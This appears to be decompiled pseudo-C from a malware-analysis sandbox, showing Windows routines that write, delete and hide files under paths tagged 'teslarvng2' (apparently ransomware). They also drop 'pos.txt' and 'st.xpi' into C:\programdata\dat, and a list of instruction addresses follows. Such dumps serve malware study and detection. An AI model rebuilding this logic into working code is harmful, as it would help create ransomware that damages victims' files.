                                                                    									 *(_t689 + 0x14) = 7;
                                                                    									_v200 = _t1056;
                                                                    									E00E743F0( &_v420,  &_v296,  &_v124);
                                                                    									_t1114 = _t1114 + 4;
                                                                    									_v16 = 0x1f;
                                                                    									__eflags = _v400 - 8;
                                                                    									_t693 =  >=  ? _v420 :  &_v420;
                                                                    									_t694 = CreateFileW( >=  ? _v420 :  &_v420, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                    									_v208 = _t694;
                                                                    									__eflags = _t694 - 0xffffffff;
                                                                    									if(_t694 != 0xffffffff) {
                                                                    										WriteFile(_t694, _v216, _v264,  &_v152, 0);
                                                                    										FlushFileBuffers(_v208);
                                                                    										CloseHandle(_v208);
                                                                    									}
                                                                    									_v16 = 0x1e;
                                                                    									L00E59AF0(_t836,  &_v420, _t1021);
                                                                    									_t1057 = _t1056 & 0xffff7fff;
                                                                    									_v200 = _t1057;
                                                                    									_v16 = 0x1d;
                                                                    									L00E59AF0(_t836,  &_v296, _t1021);
                                                                    									_t1043 = _t1057 & 0xffffbfff;
                                                                    									_v200 = _t1043;
                                                                    									_v16 = 0x1c;
                                                                    									L00E59AF0(_t836,  &_v60, _t1021);
                                                                    									_v16 = 0x1b;
                                                                    									L00E59AF0(_t836,  &_v260, _t1021);
                                                                    									_v16 = 0xa;
                                                                    									L00E83B80(_t836,  &_v100, _t1021);
                                                                    									_t1021 =  *_t1021;
                                                                    									__eflags = _t1021 - _v212;
                                                                    									if(_t1021 == _v212) {
                                                                    										goto L81;
                                                                    									} else {
                                                                    										_t987 = 0x7fffffff;
                                                                    										continue;
                                                                    									}
                                                                    									goto L102;
                                                                    									L67:
                                                                    									_t1051 = _t882 | 0x0000000f;
                                                                    									__eflags = _t1051 - 0x7fffffff;
                                                                    									_t1043 =  >  ? _t987 : _t1051;
                                                                    									_t677 = _t1043 + 1;
                                                                    									__eflags = _t677 - 0x1000;
                                                                    									if(_t677 < 0x1000) {
                                                                    										__eflags = _t677;
                                                                    										if(__eflags == 0) {
                                                                    											_t883 = 0;
                                                                    											__eflags = 0;
                                                                    										} else {
                                                                    											_push(_t677);
                                                                    											_t704 = E00EA76B3(_t836, _t987, _t1021, _t1043, __eflags);
                                                                    											_t1114 = _t1114 + 4;
                                                                    											_t883 = _t704;
                                                                    										}
                                                                    										goto L74;
                                                                    									} else {
                                                                    										_t838 = _t677 + 0x23;
                                                                    										__eflags = _t838 - _t677;
                                                                    										if(__eflags <= 0) {
                                                                    											goto L94;
                                                                    										} else {
                                                                    											_push(_t838);
                                                                    											_t705 = E00EA76B3(_t836, _t987, _t1021, _t1043, __eflags);
                                                                    											_t1114 = _t1114 + 4;
                                                                    											__eflags = _t705;
                                                                    											if(__eflags == 0) {
                                                                    												goto L93;
                                                                    											} else {
                                                                    												_t434 = _t705 + 0x23; // 0x23
                                                                    												_t883 = _t434 & 0xffffffe0;
                                                                    												 *(_t883 - 4) = _t705;
                                                                    												L74:
                                                                    												__eflags = _v208 + 1;
                                                                    												_v100 = _t883;
                                                                    												E00EA90F0(_t883, _v216, _v208 + 1);
                                                                    												_t1114 = _t1114 + 0xc;
                                                                    												_v84 = _v208;
                                                                    												_v80 = _t1043;
                                                                    												goto L75;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									goto L102;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							do {
                                                                    								_t903 =  *(_t636 + 0x18);
                                                                    								_t707 = _t636 + 8;
                                                                    								_v216 = _t707;
                                                                    								_v84 = 0;
                                                                    								_v80 = 0;
                                                                    								__eflags =  *((intOrPtr*)(_t707 + 0x14)) - 0x10;
                                                                    								_v212 = _t903;
                                                                    								if( *((intOrPtr*)(_t707 + 0x14)) >= 0x10) {
                                                                    									_v216 =  *_t707;
                                                                    								}
                                                                    								__eflags = _t903 - 0x10;
                                                                    								if(_t903 >= 0x10) {
                                                                    									_t1059 = _t903 | 0x0000000f;
                                                                    									__eflags = _t1059 - 0x7fffffff;
                                                                    									_t1043 =  >  ? _t987 : _t1059;
                                                                    									_t708 = _t1043 + 1;
                                                                    									__eflags = _t708 - 0x1000;
                                                                    									if(_t708 < 0x1000) {
                                                                    										__eflags = _t708;
                                                                    										if(__eflags == 0) {
                                                                    											_t904 = 0;
                                                                    											__eflags = 0;
                                                                    										} else {
                                                                    											_push(_t708);
                                                                    											_t754 = E00EA76B3(_t836, _t987, _t1021, _t1043, __eflags);
                                                                    											_t1114 = _t1114 + 4;
                                                                    											_t904 = _t754;
                                                                    										}
                                                                    										goto L58;
                                                                    									} else {
                                                                    										_t838 = _t708 + 0x23;
                                                                    										__eflags = _t838 - _t708;
                                                                    										if(__eflags <= 0) {
                                                                    											goto L94;
                                                                    										} else {
                                                                    											_push(_t838);
                                                                    											_t755 = E00EA76B3(_t836, _t987, _t1021, _t1043, __eflags);
                                                                    											_t1114 = _t1114 + 4;
                                                                    											__eflags = _t755;
                                                                    											if(__eflags == 0) {
                                                                    												goto L93;
                                                                    											} else {
                                                                    												_t275 = _t755 + 0x23; // 0x23
                                                                    												_t904 = _t275 & 0xffffffe0;
                                                                    												 *(_t904 - 4) = _t755;
                                                                    												L58:
                                                                    												__eflags = _v212 + 1;
                                                                    												_v100 = _t904;
                                                                    												E00EA90F0(_t904, _v216, _v212 + 1);
                                                                    												_t1114 = _t1114 + 0xc;
                                                                    												_v84 = _v212;
                                                                    												_v80 = _t1043;
                                                                    												goto L59;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									asm("movups xmm0, [eax]");
                                                                    									_v84 = _t903;
                                                                    									_v80 = 0xf;
                                                                    									asm("movups [ebp-0x58], xmm0");
                                                                    									goto L59;
                                                                    								}
                                                                    								goto L102;
                                                                    								L59:
                                                                    								_v16 = 0x11;
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_t906 =  >=  ? _v100 :  &_v100;
                                                                    								_t1061 = _v84 + ( >=  ? _v100 :  &_v100);
                                                                    								_v304 = 0;
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_v300 = 0;
                                                                    								_t908 =  >=  ? _v100 :  &_v100;
                                                                    								_v320 = 0;
                                                                    								_v220 =  >=  ? _v100 :  &_v100;
                                                                    								_v304 = 0;
                                                                    								_v300 = 7;
                                                                    								E00E798B0(_t836,  &_v320, _t1021, _v84 + ( >=  ? _v100 :  &_v100) - ( >=  ? _v100 :  &_v100));
                                                                    								_v232 = 0;
                                                                    								_push(_v232);
                                                                    								E00E7A150(_t836,  &_v320, _t1021, _v220, _v84 + ( >=  ? _v100 :  &_v100));
                                                                    								_v16 = 0x13;
                                                                    								_t718 = E00E59260( &_v320, "\\");
                                                                    								_v404 = 0;
                                                                    								_t1063 = _v200 | 0x00000100;
                                                                    								_v400 = 0;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x198], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x188], xmm0");
                                                                    								 *(_t718 + 0x10) = 0;
                                                                    								 *(_t718 + 0x14) = 7;
                                                                    								 *_t718 = 0;
                                                                    								_v200 = _t1063;
                                                                    								_v16 = 0x14;
                                                                    								_t719 = E00E59260( &_v420, L"teslarvng2");
                                                                    								_v428 = 0;
                                                                    								_v424 = 0;
                                                                    								_t1064 = _t1063 | 0x00000200;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x1b0], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x1a0], xmm0");
                                                                    								 *(_t719 + 0x10) = 0;
                                                                    								 *(_t719 + 0x14) = 7;
                                                                    								 *_t719 = 0;
                                                                    								_v200 = _t1064;
                                                                    								__eflags = _v424 - 8;
                                                                    								_t721 =  >=  ? _v444 :  &_v444;
                                                                    								DeleteFileW( >=  ? _v444 :  &_v444);
                                                                    								_t1065 = _t1064 & 0xfffffdff;
                                                                    								_v200 = _t1065;
                                                                    								_v16 = 0x13;
                                                                    								L00E59AF0(_t836,  &_v444, _t1021);
                                                                    								_v200 = _t1065 & 0xfffffeff;
                                                                    								_v16 = 0x12;
                                                                    								L00E59AF0(_t836,  &_v420, _t1021);
                                                                    								_v16 = 0x11;
                                                                    								L00E59AF0(_t836,  &_v320, _t1021);
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_t919 =  >=  ? _v100 :  &_v100;
                                                                    								_t1068 = _v84 + ( >=  ? _v100 :  &_v100);
                                                                    								_v328 = 0;
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_v324 = 0;
                                                                    								_t921 =  >=  ? _v100 :  &_v100;
                                                                    								_v344 = 0;
                                                                    								_v220 =  >=  ? _v100 :  &_v100;
                                                                    								_v328 = 0;
                                                                    								_v324 = 7;
                                                                    								E00E798B0(_t836,  &_v344, _t1021, _v84 + ( >=  ? _v100 :  &_v100) - ( >=  ? _v100 :  &_v100));
                                                                    								_v264 = 0;
                                                                    								_push(_v264);
                                                                    								E00E7A150(_t836,  &_v344, _t1021, _v220, _v84 + ( >=  ? _v100 :  &_v100));
                                                                    								_v16 = 0x16;
                                                                    								_t731 = E00E59260( &_v344, "\\");
                                                                    								_v44 = 0;
                                                                    								_t1070 = _v200 | 0x00000400;
                                                                    								_v40 = 0;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x30], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x20], xmm0");
                                                                    								 *(_t731 + 0x10) = 0;
                                                                    								 *(_t731 + 0x14) = 7;
                                                                    								 *_t731 = 0;
                                                                    								_v200 = _t1070;
                                                                    								_v16 = 0x17;
                                                                    								_t732 = E00E59260( &_v60, L"teslarvng2");
                                                                    								_v352 = 0;
                                                                    								_v348 = 0;
                                                                    								_t1071 = _t1070 | 0x00000800;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x164], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x154], xmm0");
                                                                    								 *(_t732 + 0x10) = 0;
                                                                    								 *(_t732 + 0x14) = 7;
                                                                    								 *_t732 = 0;
                                                                    								_v200 = _t1071;
                                                                    								__eflags = _v348 - 8;
                                                                    								_t734 =  >=  ? _v368 :  &_v368;
                                                                    								CreateDirectoryW( >=  ? _v368 :  &_v368, 0);
                                                                    								_t1072 = _t1071 & 0xfffff7ff;
                                                                    								_v200 = _t1072;
                                                                    								_v16 = 0x16;
                                                                    								L00E59AF0(_t836,  &_v368, _t1021);
                                                                    								_v200 = _t1072 & 0xfffffbff;
                                                                    								_v16 = 0x15;
                                                                    								L00E59AF0(_t836,  &_v60, _t1021);
                                                                    								_v16 = 0x11;
                                                                    								L00E59AF0(_t836,  &_v344, _t1021);
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_v244 = 0;
                                                                    								_t1075 =  >=  ? _v100 :  &_v100;
                                                                    								_t1076 = ( >=  ? _v100 :  &_v100) + _v84;
                                                                    								__eflags = _v80 - 0x10;
                                                                    								_v240 = 0;
                                                                    								_t932 =  >=  ? _v100 :  &_v100;
                                                                    								_v260 = 0;
                                                                    								_v220 =  >=  ? _v100 :  &_v100;
                                                                    								_v244 = 0;
                                                                    								_v240 = 7;
                                                                    								E00E798B0(_t836,  &_v260, _t1021, ( >=  ? _v100 :  &_v100) + _v84 - ( >=  ? _v100 :  &_v100));
                                                                    								_v152 = 0;
                                                                    								_push(_v152);
                                                                    								E00E7A150(_t836,  &_v260, _t1021, _v220, ( >=  ? _v100 :  &_v100) + _v84);
                                                                    								_v16 = 0x19;
                                                                    								_t744 = E00E59260( &_v260, "\\");
                                                                    								_v280 = 0;
                                                                    								_t1078 = _v200 | 0x00001000;
                                                                    								_v276 = 0;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x11c], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x10c], xmm0");
                                                                    								 *(_t744 + 0x10) = 0;
                                                                    								 *(_t744 + 0x14) = 7;
                                                                    								 *_t744 = 0;
                                                                    								_v200 = _t1078;
                                                                    								_v16 = 0x1a;
                                                                    								_t745 = E00E59260( &_v296, L"teslarvng2");
                                                                    								_v376 = 0;
                                                                    								_v372 = 0;
                                                                    								_t1079 = _t1078 | 0x00002000;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x17c], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x16c], xmm0");
                                                                    								 *(_t745 + 0x10) = 0;
                                                                    								 *(_t745 + 0x14) = 7;
                                                                    								 *_t745 = 0;
                                                                    								_v200 = _t1079;
                                                                    								__eflags = _v372 - 8;
                                                                    								_t747 =  >=  ? _v392 :  &_v392;
                                                                    								SetFileAttributesW( >=  ? _v392 :  &_v392, 2);
                                                                    								_t1080 = _t1079 & 0xffffdfff;
                                                                    								_v200 = _t1080;
                                                                    								_v16 = 0x19;
                                                                    								L00E59AF0(_t836,  &_v392, _t1021);
                                                                    								_t1043 = _t1080 & 0xffffefff;
                                                                    								_v200 = _t1043;
                                                                    								_v16 = 0x18;
                                                                    								L00E59AF0(_t836,  &_v296, _t1021);
                                                                    								_v16 = 0x11;
                                                                    								L00E59AF0(_t836,  &_v260, _t1021);
                                                                    								_v16 = 0xa;
                                                                    								L00E83B80(_t836,  &_v100, _t1021);
                                                                    								_t987 = 0x7fffffff;
                                                                    								_t636 =  *_v208;
                                                                    								_v208 = _t636;
                                                                    								__eflags = _t636 - _t1021;
                                                                    							} while (_t636 != _t1021);
                                                                    							_t1021 =  *0xf2c174; // 0x80deb0
                                                                    							_v212 = _t1021;
                                                                    							goto L61;
                                                                    						}
                                                                    					} else {
                                                                    						_t797 = _t1021;
                                                                    						if( *((intOrPtr*)(_t1021 + 0x14)) >= 0x10) {
                                                                    							_t797 =  *_t1021;
                                                                    						}
                                                                    						 *(_t1021 + 0x10) = 0;
                                                                    						 *_t797 = 0;
                                                                    						_t798 =  *0xf2c174; // 0x80deb0
                                                                    						_v152 = _t798;
                                                                    						_t1021 =  *_t798;
                                                                    						_t1134 = _t1021 - _t798;
                                                                    						while(_t1134 != 0) {
                                                                    							_t40 = _t1021 + 8; // 0x8
                                                                    							_t810 = _t40;
                                                                    							_t969 =  *(_t810 + 0x10);
                                                                    							_t989 = 0x7fffffff;
                                                                    							_v212 = _t810;
                                                                    							_v84 = 0;
                                                                    							_v80 = 0;
                                                                    							_v224 = _t969;
                                                                    							if( *((intOrPtr*)(_t1021 + 0x1c)) >= 0x10) {
                                                                    								_v212 =  *_t810;
                                                                    							}
                                                                    							if(_t969 >= 0x10) {
                                                                    								_t1093 = _t969 | 0x0000000f;
                                                                    								__eflags = _t1093 - 0x7fffffff;
                                                                    								_t1043 =  >  ? _t989 : _t1093;
                                                                    								_t811 = _t1043 + 1;
                                                                    								__eflags = _t811 - 0x1000;
                                                                    								if(_t811 < 0x1000) {
                                                                    									__eflags = _t811;
                                                                    									if(__eflags == 0) {
                                                                    										_t970 = 0;
                                                                    										__eflags = 0;
                                                                    									} else {
                                                                    										_push(_t811);
                                                                    										_t832 = E00EA76B3(_t836, _t989, _t1021, _t1043, __eflags);
                                                                    										_t1114 = _t1114 + 4;
                                                                    										_t970 = _t832;
                                                                    									}
                                                                    									goto L19;
                                                                    								} else {
                                                                    									_t838 = _t811 + 0x23;
                                                                    									__eflags = _t838 - _t811;
                                                                    									if(__eflags <= 0) {
                                                                    										L94:
                                                                    										L00E598B0(_t836, _t987, _t1021, _t1043, __eflags);
                                                                    										L95:
                                                                    										E00E59480(_t838);
                                                                    										L96:
                                                                    										E00E59480(_t838);
                                                                    										L97:
                                                                    										E00E59480(_t838);
                                                                    										L98:
                                                                    										E00E59480(_t838);
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										_push(_t1105);
                                                                    										_t1106 = _t1114;
                                                                    										_push(0xffffffff);
                                                                    										_push(0xec7bbd);
                                                                    										_push( *[fs:0x0]);
                                                                    										_t609 =  *0xeef074; // 0xa6abe2d4
                                                                    										_t610 = _t609 ^ _t1106;
                                                                    										_v464 = _t610;
                                                                    										_push(_t1043);
                                                                    										_push(_t1021);
                                                                    										_push(_t610);
                                                                    										 *[fs:0x0] =  &_v460;
                                                                    										_t1022 = _v416;
                                                                    										_v452 = 0;
                                                                    										__eflags = _v420 - 8;
                                                                    										_t613 =  >=  ? _v440 :  &_v440;
                                                                    										_t1044 = CreateFileW( >=  ? _v440 :  &_v440, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                    										__eflags = _t1044 - 0xffffffff;
                                                                    										if(_t1044 != 0xffffffff) {
                                                                    											WriteFile(_t1044, _t1022, _a20,  &_v36, 0);
                                                                    											FlushFileBuffers(_t1044);
                                                                    											CloseHandle(_t1044);
                                                                    										}
                                                                    										_v20 = 0xffffffff;
                                                                    										L00E59AF0(_t836,  &_v8, _t1022);
                                                                    										 *[fs:0x0] = _v28;
                                                                    										__eflags = _v32 ^ _t1106;
                                                                    										return E00EA7663(_v32 ^ _t1106);
                                                                    									} else {
                                                                    										_push(_t838);
                                                                    										_t833 = E00EA76B3(_t836, _t989, _t1021, _t1043, __eflags);
                                                                    										_t1114 = _t1114 + 4;
                                                                    										__eflags = _t833;
                                                                    										if(__eflags == 0) {
                                                                    											L93:
                                                                    											E00EABFBF(_t836, _t838, _t987, _t1021, __eflags);
                                                                    											goto L94;
                                                                    										} else {
                                                                    											_t51 = _t833 + 0x23; // 0x23
                                                                    											_t970 = _t51 & 0xffffffe0;
                                                                    											 *(_t970 - 4) = _t833;
                                                                    											L19:
                                                                    											__eflags = _v224 + 1;
                                                                    											_v100 = _t970;
                                                                    											E00EA90F0(_t970, _v212, _v224 + 1);
                                                                    											_t1114 = _t1114 + 0xc;
                                                                    											_v84 = _v224;
                                                                    											_v80 = _t1043;
                                                                    											goto L20;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								asm("movups xmm0, [eax]");
                                                                    								_v84 = _t969;
                                                                    								_v80 = 0xf;
                                                                    								asm("movups [ebp-0x58], xmm0");
                                                                    								L20:
                                                                    								_v16 = 3;
                                                                    								_v304 = 0;
                                                                    								_t1095 =  >=  ? _v100 :  &_v100;
                                                                    								_t1096 = ( >=  ? _v100 :  &_v100) + _v84;
                                                                    								_v300 = 0;
                                                                    								_t972 =  >=  ? _v100 :  &_v100;
                                                                    								_v320 = 0;
                                                                    								_v216 =  >=  ? _v100 :  &_v100;
                                                                    								_v304 = 0;
                                                                    								_v300 = 7;
                                                                    								E00E798B0(_t836,  &_v320, _t1021, ( >=  ? _v100 :  &_v100) + _v84 - ( >=  ? _v100 :  &_v100));
                                                                    								_v268 = 0;
                                                                    								_push(_v268);
                                                                    								E00E7A150(_t836,  &_v320, _t1021, _v216, ( >=  ? _v100 :  &_v100) + _v84);
                                                                    								_v16 = 5;
                                                                    								_t821 = E00E59260( &_v320, "\\");
                                                                    								_v352 = 0;
                                                                    								_t1098 = _v200 | 0x00000001;
                                                                    								_v348 = 0;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x164], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x154], xmm0");
                                                                    								 *(_t821 + 0x10) = 0;
                                                                    								 *(_t821 + 0x14) = 7;
                                                                    								 *_t821 = 0;
                                                                    								_v200 = _t1098;
                                                                    								_v16 = 6;
                                                                    								_t822 = E00E59260( &_v368, L"teslarvng2");
                                                                    								_v376 = 0;
                                                                    								_v372 = 0;
                                                                    								_t1099 = _t1098 | 0x00000002;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x17c], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x16c], xmm0");
                                                                    								 *(_t822 + 0x10) = 0;
                                                                    								 *(_t822 + 0x14) = 7;
                                                                    								 *_t822 = 0;
                                                                    								_v200 = _t1099;
                                                                    								_v16 = 7;
                                                                    								_t823 = E00E72E40(_t836,  &_v392, _v208);
                                                                    								_v244 = 0;
                                                                    								_v240 = 0;
                                                                    								_t1100 = _t1099 | 0x00000004;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0xf8], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0xe8], xmm0");
                                                                    								 *(_t823 + 0x10) = 0;
                                                                    								 *(_t823 + 0x14) = 7;
                                                                    								 *_t823 = 0;
                                                                    								_v200 = _t1100;
                                                                    								_t825 =  >=  ? _v260 :  &_v260;
                                                                    								DeleteFileW( >=  ? _v260 :  &_v260);
                                                                    								_t1101 = _t1100 & 0xfffffffb;
                                                                    								_v200 = _t1101;
                                                                    								_v16 = 6;
                                                                    								L00E59AF0(_t836,  &_v260, _t1021);
                                                                    								_t1102 = _t1101 & 0xfffffffd;
                                                                    								_v200 = _t1102;
                                                                    								_v16 = 5;
                                                                    								L00E59AF0(_t836,  &_v392, _t1021);
                                                                    								_t1043 = _t1102 & 0xfffffffe;
                                                                    								_v200 = _t1043;
                                                                    								_v16 = 4;
                                                                    								L00E59AF0(_t836,  &_v368, _t1021);
                                                                    								_v16 = 3;
                                                                    								L00E59AF0(_t836,  &_v320, _t1021);
                                                                    								_v16 = 1;
                                                                    								L00E83B80(_t836,  &_v100, _t1021);
                                                                    								_t1021 =  *_t1021;
                                                                    								_t1134 = _t1021 - _v152;
                                                                    								continue;
                                                                    							}
                                                                    							goto L102;
                                                                    						}
                                                                    						_v16 = 8;
                                                                    						_t1021 = 0x7ffffffe;
                                                                    						_t838 =  *0xf29228; // 0x6
                                                                    						__eflags = 0x7ffffffe - _t838 - 0x10;
                                                                    						if(0x7ffffffe - _t838 < 0x10) {
                                                                    							goto L95;
                                                                    						} else {
                                                                    							__eflags =  *0xf2922c - 8;
                                                                    							_t802 =  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:";
                                                                    							_t803 = E00E77D30( &_v296, _t989, _v272, _t838,  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:", _t838, L"\\programdata\\dat", 0x10);
                                                                    							_t1089 = _t1043 | 0x00000008;
                                                                    							_v200 = _t1089;
                                                                    							_v16 = 9;
                                                                    							_t804 = E00E72E40(_t836, _t803, _v208);
                                                                    							_v244 = 0;
                                                                    							_v240 = 0;
                                                                    							_t1090 = _t1089 | 0x00000010;
                                                                    							asm("movups xmm0, [eax]");
                                                                    							asm("movups [ebp-0xf8], xmm0");
                                                                    							asm("movq xmm0, [eax+0x10]");
                                                                    							asm("movq [ebp-0xe8], xmm0");
                                                                    							 *(_t804 + 0x10) = 0;
                                                                    							 *(_t804 + 0x14) = 7;
                                                                    							 *_t804 = 0;
                                                                    							_v200 = _t1090;
                                                                    							__eflags = _v240 - 8;
                                                                    							_t806 =  >=  ? _v260 :  &_v260;
                                                                    							DeleteFileW( >=  ? _v260 :  &_v260);
                                                                    							_t1091 = _t1090 & 0xffffffef;
                                                                    							_v200 = _t1091;
                                                                    							_v16 = 8;
                                                                    							L00E59AF0(_t836,  &_v260, 0x7ffffffe);
                                                                    							_t1043 = _t1091 & 0xfffffff7;
                                                                    							_v200 = _t1043;
                                                                    							_v16 = 1;
                                                                    							L00E59AF0(_t836,  &_v296, 0x7ffffffe);
                                                                    							L89:
                                                                    							_push(4);
                                                                    							_push(0xf2c0a0);
                                                                    							_v16 = 0x22;
                                                                    							_t838 =  *0xf29228; // 0x6
                                                                    							_t1021 = 0x7ffffffe - _t838;
                                                                    							__eflags = _t1021 - 0x10;
                                                                    							if(_t1021 < 0x10) {
                                                                    								goto L97;
                                                                    							} else {
                                                                    								__eflags =  *0xf2922c - 8;
                                                                    								_t651 =  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:";
                                                                    								_t652 = E00E77D30( &_v60, _t989, _v272, _t838,  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:", _t838, L"\\programdata\\dat", 0x10);
                                                                    								_t1120 = _t1114 - 0x18;
                                                                    								_t1047 = _t1043 | 0x00080000;
                                                                    								_v200 = _t1047;
                                                                    								_v232 = _t1120;
                                                                    								E00E59140(_t1120, _t652, L"\\pos.txt");
                                                                    								_v16 = 0x23;
                                                                    								_v16 = 0x22;
                                                                    								L99();
                                                                    								_v200 = _t1047 & 0xfff7ffff;
                                                                    								_v16 = 1;
                                                                    								L00E59AF0(_t836,  &_v60, _t1021);
                                                                    								_t863 =  *0xf2c068; // 0x0
                                                                    								_t655 =  *0xf2c06c; // 0x0
                                                                    								asm("adc eax, [0xf2c07c]");
                                                                    								_t1043 = E00E83350(_t836,  &_v420, _t1047 & 0xfff7ffff, _t863 +  *0xf2c078, _t655);
                                                                    								_v16 = 0x24;
                                                                    								_t997 =  *0xf2c070; // 0x0
                                                                    								_t866 =  *0xf2c074; // 0x0
                                                                    								asm("adc ecx, [0xf2c084]");
                                                                    								_t657 = E00E83350(_t836,  &_v60, _t1043, _t997 +  *0xf2c080, _t866);
                                                                    								_v16 = 0x26;
                                                                    								_push(2);
                                                                    								_t658 = E00E82E90(_t836, _t657, _t1021, "\r\n");
                                                                    								_v280 = 0;
                                                                    								_v276 = 0;
                                                                    								_t1026 = _v200 | 0x00200000;
                                                                    								asm("movups xmm0, [eax]");
                                                                    								asm("movups [ebp-0x11c], xmm0");
                                                                    								asm("movq xmm0, [eax+0x10]");
                                                                    								asm("movq [ebp-0x10c], xmm0");
                                                                    								 *(_t658 + 0x10) = 0;
                                                                    								 *(_t658 + 0x14) = 0xf;
                                                                    								 *_t658 = 0;
                                                                    								_v200 = _t1026;
                                                                    								E00E748D0( &_v188,  &_v296, _t1043);
                                                                    								_t1114 = _t1120 + 0x18;
                                                                    								_v16 = 0x27;
                                                                    								_t1021 = _t1026 & 0xffdfffff;
                                                                    								_v200 = _t1021;
                                                                    								_v16 = 0x28;
                                                                    								L00E83B80(_t836,  &_v296, _t1021);
                                                                    								_v16 = 0x29;
                                                                    								L00E83B80(_t836,  &_v60, _t1021);
                                                                    								_v16 = 0x2a;
                                                                    								L00E83B80(_t836,  &_v420, _t1021);
                                                                    								__eflags = _v168 - 0x10;
                                                                    								_push(_v172);
                                                                    								_t664 =  >=  ? _v188 :  &_v188;
                                                                    								_push( >=  ? _v188 :  &_v188);
                                                                    								_v16 = 0x2b;
                                                                    								_t838 =  *0xf29228; // 0x6
                                                                    								__eflags = 0x7ffffffe - _t838 - 0x10;
                                                                    								if(0x7ffffffe - _t838 < 0x10) {
                                                                    									goto L98;
                                                                    								} else {
                                                                    									__eflags =  *0xf2922c - 8;
                                                                    									_t668 =  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:";
                                                                    									_t669 = E00E77D30( &_v296,  &_v296, _v272, _t838,  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:", _t838, L"\\programdata\\dat", 0x10);
                                                                    									_t1027 = _t1021 | 0x00800000;
                                                                    									_v200 = _t1027;
                                                                    									_v232 = _t1114 - 0x18;
                                                                    									E00E59140(_t1114 - 0x18, _t669, L"\\st.xpi");
                                                                    									_v16 = 0x2c;
                                                                    									_v16 = 0x2b;
                                                                    									L99();
                                                                    									_v200 = _t1027 & 0xff7fffff;
                                                                    									_v16 = 0x2a;
                                                                    									L00E59AF0(_t836,  &_v296, _t1027 & 0xff7fffff);
                                                                    									_v16 = 1;
                                                                    									L00E83B80(_t836,  &_v188, _t1027 & 0xff7fffff);
                                                                    									_v16 = 0;
                                                                    									L00E83B80(_t836,  &_v148, _t1027 & 0xff7fffff);
                                                                    									_v16 = 0xffffffff;
                                                                    									E00EA5E5C(0xf2c23c);
                                                                    									 *[fs:0x0] = _v24;
                                                                    									__eflags = _v32 ^ _t1105;
                                                                    									return E00EA7663(_v32 ^ _t1105);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L102:
                                                                    			}







































































































































































































                                                                    0x00e69d10
                                                                    0x00e69d10
                                                                    0x00e69d10
                                                                    0x00e69d11
                                                                    0x00e69d19
                                                                    0x00e69d20
                                                                    0x00e69d24
                                                                    0x00e69d26
                                                                    0x00e69d28
                                                                    0x00e69d33
                                                                    0x00e69d34
                                                                    0x00e69d3b
                                                                    0x00e69d40
                                                                    0x00e69d42
                                                                    0x00e69d45
                                                                    0x00e69d46
                                                                    0x00e69d47
                                                                    0x00e69d4b
                                                                    0x00e69d51
                                                                    0x00e69d57
                                                                    0x00e69d59
                                                                    0x00e69d62
                                                                    0x00e69d64
                                                                    0x00e69d6f
                                                                    0x00e69d75
                                                                    0x00e69d7f
                                                                    0x00e69d84
                                                                    0x00e69d89
                                                                    0x00e6b2f1
                                                                    0x00e6b2f2
                                                                    0x00000000
                                                                    0x00e69d8f
                                                                    0x00e69d8f
                                                                    0x00e69d97
                                                                    0x00e69d9a
                                                                    0x00e69d9d
                                                                    0x00e69da0
                                                                    0x00e69da3
                                                                    0x00e69da9
                                                                    0x00e69db0
                                                                    0x00e69db7
                                                                    0x00e69dbd
                                                                    0x00e69dc8
                                                                    0x00e69dcf
                                                                    0x00e69dd1
                                                                    0x00e69dd1
                                                                    0x00e69dd8
                                                                    0x00e69dde
                                                                    0x00e69de7
                                                                    0x00e69dee
                                                                    0x00e69dfd
                                                                    0x00e69e00
                                                                    0x00e69e08
                                                                    0x00e69e0d
                                                                    0x00e69e10
                                                                    0x00e69e12
                                                                    0x00e69e18
                                                                    0x00e69e1f
